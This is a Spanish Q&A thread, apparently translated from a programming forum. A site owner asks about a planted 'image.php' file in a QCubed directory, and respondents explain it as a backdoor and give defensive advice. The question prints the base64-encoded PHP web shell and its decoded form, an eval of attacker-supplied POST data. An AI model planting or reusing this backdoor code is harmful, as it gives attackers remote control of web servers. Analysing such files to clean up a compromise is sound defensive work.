1. Inicio
  2. Pregunta y respuesta
  3. ¿Qué hace eval en base64 la variable $ _POST ['e'] en realidad?

¿Qué hace eval en base64 la variable $ _POST ['e'] en realidad?

2010-11-22 7 views
9

Ok, esto es lo que busqué en Google:

Parece que hay un archivo cargado llamado "image.php" que se carga en un directorio qcubed.

Ese archivo image.php contiene el siguiente código de base 64:

aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==

decodificada se suma a esto:

if(isset($_POST['e'])) 

eval(base64_decode($_POST['e'])); 

echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';

buscar la cadena outputed he encontrado vulnerabilidades qcubed simillar en otros sitios.

Decodificación de la última cadena se hizo eco de que tengo:

196.231-172.28:ifacermpubmice:afac42eri02

que realmente el `t entender lo que hace (usando: http://ostermiller.org/calc/encode.html).

¿Puede explicarme en qué me estoy enfrentando aquí? ¿Qué vulnerabilidad de seguridad debo abordar para solucionar esto?

Fuente

2010-11-22 Gabriel

+0

Descubrí lo que podría contener, parece que se parece a la estructura del archivo passwd, échale un vistazo aquí http://www.regatta.cmc.msu.ru/doc/usr/share/man/info/ru_RU/ a_doc_lib/files/aixfiles/passwd.htm, tal vez esto ayude a alguien. – Gabriel

+0

Has dicho que has subido a un directorio qcubed. ¿Puede explicar qué quiere decir con un directorio 'qcubed'? –

+0

@VaibhavKaushal QCubed es un Framework y el directorio qcubed no es esencial. – Gabriel

Respuesta

5

El script ejecutará cualquier código PHP que obtenga de la variable POST e, que por supuesto es una vulnerabilidad horrible y peligrosa.

La declaración echopodría ser una confirmación del script de ataque que tiene instalada la versión correcta o algo así.

Sin embargo, esto solo es peligroso si el archivo image.php realmente se puede ejecutar en ese directorio. Es difícil dar consejos sobre qué hacer sin saber cómo llegó el archivo en primer lugar.

Fuente

2010-11-22 13:00:25

+0

Eso es exactamente eso. Realmente no sé cómo llegó allí, parece que otros directorios de qcubed se han visto afectados. De todos modos, el directorio y, por lo tanto, el archivo no se puede acceder directamente, a menos que este ataque se mezcle con algún otro ataque que aún no haya descubierto al respecto. ¿Algún consejo, consejo? Otra cosa que he hecho es limitar el directorio solo al área local mediante una cláusula de límite con un .htaccess dedicado en el directorio raíz de qcubed. De nuevo, ¿algún consejo y consejo? – Gabriel

+0

@Gabriel es difícil de decir: podría ser que se usó una vulnerabilidad en Gcubed para plantar esos archivos en todos los directorios posibles. También podría haber sido una violación en alguna otra aplicación web (una versión obsoleta de Wordpress sería probablemente un culpable). Si tu cuenta de FTP estuviera comprometida, el atacante difícilmente se habría tomado la molestia de copiar archivos como esos, no estoy seguro por supuesto, pero esto realmente huele como una vulnerabilidad que fue explotada por un script. Tal vez busque en los foros de Gcubed si existen vulnerabilidades conocidas. –

+0

Asegúrese de que los archivos subidos tampoco puedan ser incluidos por las secuencias de comandos legales (por ejemplo, con la entrada de datos no validada). Desafortunadamente, esto no se puede restringir con htaccess. –

2

Lo más probable es que un script kiddie usara un exploit para entrar en su sitio. Asegúrate de que tu aplicación PHP y tus bibliotecas estén actualizadas.

Fuente

2010-11-22 21:24:27 rook

Cuestiones relacionadas

 Cuestiones relacionadas